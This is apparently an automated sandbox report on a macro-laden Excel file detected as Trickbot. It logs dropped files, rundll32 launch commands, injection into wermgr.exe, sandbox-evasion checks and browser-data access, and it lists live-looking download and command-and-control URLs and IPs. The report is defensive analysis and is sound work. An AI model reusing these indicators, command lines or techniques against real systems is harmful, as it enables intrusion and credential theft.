                Source: Sign-1870635479_637332644.xlsInitial sample: EXEC
                Office process drops PE fileShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007B470 NtDelayExecution,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000743C0 NtQuerySystemInformation,DuplicateHandle,CLSIDFromString,HeapFree,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00068010
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00082060
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007BCA0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00078CA0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006E0F0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000789B0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00069200
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061290
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000743C0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00077840
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00080870
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000644C0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000790E0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000714F0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061500
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00076100
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00076D10
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00072580
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007CA00
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007BE20
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00077630
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007CE70
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006A280
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006C290
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006CEB0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007B700
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00073B00
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006E310
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00062720
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00075F70
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000763A8
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000717B0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000A0040
                Source: Sign-1870635479_637332644.xlsOLE indicator, VBA macros: true
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: Joe Sandbox ViewDropped File: C:\Users\user\BASE.BABAA AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: Sign-1870635479_637332644.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                Source: rundll32.exe, 00000003.00000002.2101338428.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099089069.0000000001E10000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2370111419.0000000033B90000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364431540.00000000007E0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLS@12/14@8/7
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00064C40 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006376C CoCreateInstance,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\EADE0000Jump to behavior
                Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{BA5C2D35-9525-F18A-93AF-F2722C9E59B0}
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCDD9.tmpJump to behavior
                Source: Sign-1870635479_637332644.xlsOLE indicator, Workbook stream: true
                Source: C:\Windows\System32\wermgr.exeSystem information queried: HandleInformation
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknownProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: unknownProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {C999D15C-7BEE-4793-989A-0EF4E6A22007} S-1-5-18:NT AUTHORITY\System:Service:
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor3154395120\ujBASEmc.rrd',DllRegisterServer
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor3154395120\ujBASEmc.rrd',DllRegisterServer
                Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2100627167.000000006E419000.00000002.00020000.sdmp, BASE.BABAA.0.dr
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_007C1BD0 push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_007C1CFD push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_007C1C7A push dword ptr [edx+14h]; ret
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007D0F0 push 8B48D233h; iretd
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Windows\System32\wermgr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                Source: C:\Windows\System32\wermgr.exeFunction Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,adjustToken,handleClosed,systemQueried,systemQueried,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,languageOrLocalQueried,threadDelayed,threadDelayed,threadDelayed,threadInformationSet,threadInformationSet,systemQueried,systemQueried,fileOpened,directoryQueried
                Tries to detect virtualization through RDTSC time measurementsShow sources
                Source: C:\Windows\System32\wermgr.exeRDTSC instruction interceptor: First address: 000000000006EAD0 second address: 000000000006EAD0 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec esp 0x0000000b mov edi, eax 0x0000000d call dword ptr [0000E3AEh] 0x00000013 jmp 00007F110CB35C50h 0x00000015 jmp dword ptr [0007C47Ah] 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 mov eax, dword ptr [7FFE0320h] 0x0000002a dec eax 0x0000002b imul eax, ecx 0x0000002e dec eax 0x0000002f shr eax, 18h 0x00000032 ret 0x00000033 inc esp 0x00000034 mov esi, eax 0x00000036 dec ecx 0x00000037 mov esi, edi 0x00000039 dec eax 0x0000003a xor esi, FFFFFF00h 0x00000040 dec ecx 0x00000041 and esi, edi 0x00000043 call 00007F110CB2DAE6h 0x00000048 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: GetAdaptersInfo,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Windows\System32\taskeng.exe TID: 2472Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\wermgr.exeLast function: Thread delayed
                Source: C:\Windows\System32\wermgr.exeLast function: Thread delayed
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061290 FindFirstFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000646F0 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007FBB0 FindFirstFileW,SleepEx,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00073070 LdrLoadDll,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E40B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E40B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E407DE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00082060 SetCurrentDirectoryW,SleepEx,SetTimer,RtlAddVectoredExceptionHandler,

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Allocates memory in foreign processesShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\wermgr.exe base: 60000 protect: page execute and read and write
                Writes to foreign memory regionsShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: 60000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: FF2B93F8
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor3154395120\ujBASEmc.rrd',DllRegisterServer
                Source: wermgr.exe, 00000006.00000002.2364543296.0000000000710000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: wermgr.exe, 00000006.00000002.2364543296.0000000000710000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: wermgr.exe, 00000006.00000002.2364543296.0000000000710000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Windows\System32\wermgr.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Windows\System32\wermgr.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 BlobJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 2832, type: MEMORY
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2098758914.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2094809366.0000000000324000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2094797786.0000000000324000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2099036393.0000000000878000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2098808409.00000000002F0000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Windows\System32\wermgr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultSecurityPreloadState.txt
                Source: C:\Windows\System32\wermgr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultcompatibility.ini
                Source: C:\Windows\System32\wermgr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultAlternateServices.txt
                Source: C:\Windows\System32\wermgr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultSiteSecurityServiceState.txt

                Remote Access Functionality:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 2832, type: MEMORY
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2098758914.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2094809366.0000000000324000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2094797786.0000000000324000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2099036393.0000000000878000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2098808409.00000000002F0000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScripting21Path InterceptionExtra Window Memory Injection1Disable or Modify Tools21OS Credential Dumping1File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API1Boot or Logon Initialization ScriptsAccess Token Manipulation1Scripting21LSASS MemorySystem Information Discovery114Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution33Logon Script (Windows)Process Injection212Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Extra Window Memory Injection1NTDSSecurity Software Discovery22Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading121LSA SecretsVirtualization/Sandbox Evasion1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection212Proc FilesystemSystem Network Configuration Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 355634 Sample: Sign-1870635479_637332644.xls Startdate: 20/02/2021 Architecture: WINDOWS Score: 100 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Found malware configuration 2->44 46 Antivirus detection for URL or domain 2->46 48 10 other signatures 2->48 8 EXCEL.EXE 84 41 2->8         started        13 taskeng.exe 1 2->13         started        process3 dnsIp4 32 chipmania.it 185.81.0.78, 49165, 80 SERVERPLAN-ASIT Italy 8->32 34 www.chipmania.it 8->34 28 C:\Users\user\BASE.BABAA, PE32 8->28 dropped 30 C:\Users\user\AppData\Local\...\10[1].jjkes, PE32 8->30 dropped 60 Document exploit detected (process start blacklist hit) 8->60 62 Document exploit detected (UrlDownloadToFile) 8->62 15 rundll32.exe 8->15         started        17 rundll32.exe 13->17         started        file5 signatures6 process7 process8 19 rundll32.exe 15->19         started        signatures9 50 Writes to foreign memory regions 19->50 52 Allocates memory in foreign processes 19->52 22 wermgr.exe 19->22         started        25 wermgr.exe 4 6 19->25         started        process10 dnsIp11 54 Tries to detect virtualization through RDTSC time measurements 22->54 56 Found evasive API chain (trying to detect sleep duration tampering with parallel thread) 22->56 36 193.8.194.96, 443, 49170, 49173 FIBERHUBUS United Kingdom 25->36 38 5.202.150.151, 447 DIDEHABNNETIR Iran (ISLAMIC Republic Of) 25->38 40 9 other IPs or domains 25->40 58 Tries to harvest and steal browser information (history, passwords, etc) 25->58 signatures12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes11%MetadefenderBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes41%ReversingLabsWin32.Trojan.Trickpak
                C:\Users\user\BASE.BABAA11%MetadefenderBrowse
                C:\Users\user\BASE.BABAA41%ReversingLabsWin32.Trojan.Trickpak

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                ident.me0%VirustotalBrowse
                chipmania.it1%VirustotalBrowse
                www.chipmania.it2%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://ident.me/0%Avira URL Cloudsafe
                http://cps.letsencrypt.org00%URL Reputationsafe
                http://cps.letsencrypt.org00%URL Reputationsafe
                http://cps.letsencrypt.org00%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://www.chipmania.it/mails/open.php100%Avira URL Cloudmalware
                http://crl.microsofv0%Avira URL Cloudsafe
                https://193.8.194.96/rob60/134349_W617601.1D7953BB38B5711FB702EBB79BB8BAD5/14/NAT%20status/client%200%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://r3.i.lencr.org/0;0%Avira URL Cloudsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                https://103.233.118.34:447/rob60/134349_W617601.1D7953BB38B5711FB702EBB79BB8BAD5/5/pwgrab64/0%Avira URL Cloudsafe
                https://103.220.47.220:447/rob60/134349_W617601.1D7953BB38B5711FB702EBB79BB8BAD5/5/pwgrab64/0%Avira URL Cloudsafe
                https://45.155.173.242/rob60/134349_W617601.1D7953BB38B5711FB702EBB79BB8BAD5/5/file/0%Avira URL Cloudsafe
                http://r3.o.lencr.org00%URL Reputationsafe
                http://r3.o.lencr.org00%URL Reputationsafe
                http://r3.o.lencr.org00%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://servername/isapibackend.dll0%Avira URL Cloudsafe
                http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                http://cps.root-x1.letsencrypt.org00%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                ident.me
                176.58.123.25
                truefalseunknown
                chipmania.it
                185.81.0.78
                truefalseunknown
                38.52.17.84.zen.spamhaus.org
                unknown
                unknownfalse
                  high
                  38.52.17.84.cbl.abuseat.org
                  unknown
                  unknownfalse
                    high
                    38.52.17.84.dnsbl-1.uceprotect.net
                    unknown
                    unknownfalse
                      unknown
                      www.chipmania.it
                      unknown
                      unknownfalseunknown
                      38.52.17.84.b.barracudacentral.org
                      unknown
